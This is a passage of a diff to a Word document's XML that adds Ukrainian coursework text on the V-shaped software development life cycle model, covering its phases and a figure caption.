+        <w:t>розробки</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ПО. У </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ній</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>підкреслені</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>взаємозв'язки</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>що</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>існують</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>між</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>аналітичними</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> фазами і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фазами</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>проектування</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>які</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>передують</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>кодування</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>після</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>якого</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>йдуть</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фази</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>тестування</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Пунктирні</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>лінії</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>означаают</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>що</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ці</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фази</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>необхідно</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розглядати</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>паралельно</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D34EFBD" wp14:editId="6829F3FB">
+            <wp:extent cx="4752975" cy="2724150"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="3" name="Рисунок 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4752975" cy="2724150"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Рисунок 1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>X</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна модель життєвого циклу розробки програмного забезпечення</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6756,6 +9014,8 @@
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -8206,6 +10466,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -8662,7 +10923,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Спостереження</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -9683,7 +11943,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8">
+                    <a:blip r:embed="rId9">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9871,7 +12131,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -8814,6 +8814,430 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Фази V-подібної моделі</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Нижче подано короткий опис кожної фази V-подібної моделі, починаючи від планування проекту та вимог аж до приймальних випробувань:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>планування проекту та вимог - визначаються системні вимоги, а також те, яким чином будуть розподілені ресурси організації з метою їх відповідності поставленим вимогам. (В разі необхідності на цій фалі виконується визначення функцій для апаратного і програмного забезпечення);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>аналіз вимог до продукту і його специфікації - аналіз існуючої на даний момент проблеми з ПО, завершується повною специфікацією очікуваної зовнішньої лінії поведінки створюваної програмної системи;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>архітектура або проектування на вищому рівні - визначає, яким чином функції ПО повинні застосуватися при реалізації проекту;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>деталізована розробка проекту - визначає і документально обґрунтовує алгоритми для кожного компонента, який був визначений на фазі побудови архітектури. Ці алгоритми надалі будуть перетворені в код;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
